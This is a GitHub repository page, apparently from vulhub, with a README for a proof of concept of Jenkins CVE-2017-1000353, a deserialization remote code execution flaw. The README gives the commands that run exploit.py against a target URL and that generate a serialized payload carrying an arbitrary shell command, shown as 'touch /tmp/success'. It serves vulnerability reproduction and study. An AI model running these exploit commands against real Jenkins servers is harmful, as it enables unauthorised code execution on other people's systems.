CVE-2017-1000353 POC

How to reproduce the Jenkins CVE-2017-1000353？

Clone this repository, use the pre-built payload jenkins_poc.ser with flowing command:

python exploit.py http://your-ip:8080 jenkins_poc.ser

Then the touch /tmp/success would be executed.

Java Version Requirements

Important: The payload generation is dependent on the Java version. It has been successfully tested with openjdk:8u292. Other Java versions may not work properly for payload generation and exploitation.

How to generate the payload `jenkins_poc.ser`？

Download CVE-2017-1000353-SNAPSHOT-all.jar.

java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

If you're using Docker, you can use the following command to ensure compatibility:

docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Reference

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
src/main/java/org/vulhub		src/main/java/org/vulhub
.gitignore		.gitignore
CVE20171000353.iml		CVE20171000353.iml
README.md		README.md
exploit.py		exploit.py
jenkins_poc.ser		jenkins_poc.ser
pom.xml		pom.xml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

CVE-2017-1000353 POC

Java Version Requirements

How to generate the payload `jenkins_poc.ser`？

Reference

About

Uh oh!

Releases 2

Packages

Uh oh!

Languages

vulhub/CVE-2017-1000353

Folders and files

Latest commit

History

Repository files navigation

CVE-2017-1000353 POC

Java Version Requirements

How to generate the payload jenkins_poc.ser？

Reference

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases 2

Packages 0

Uh oh!

Languages

How to generate the payload `jenkins_poc.ser`？

Packages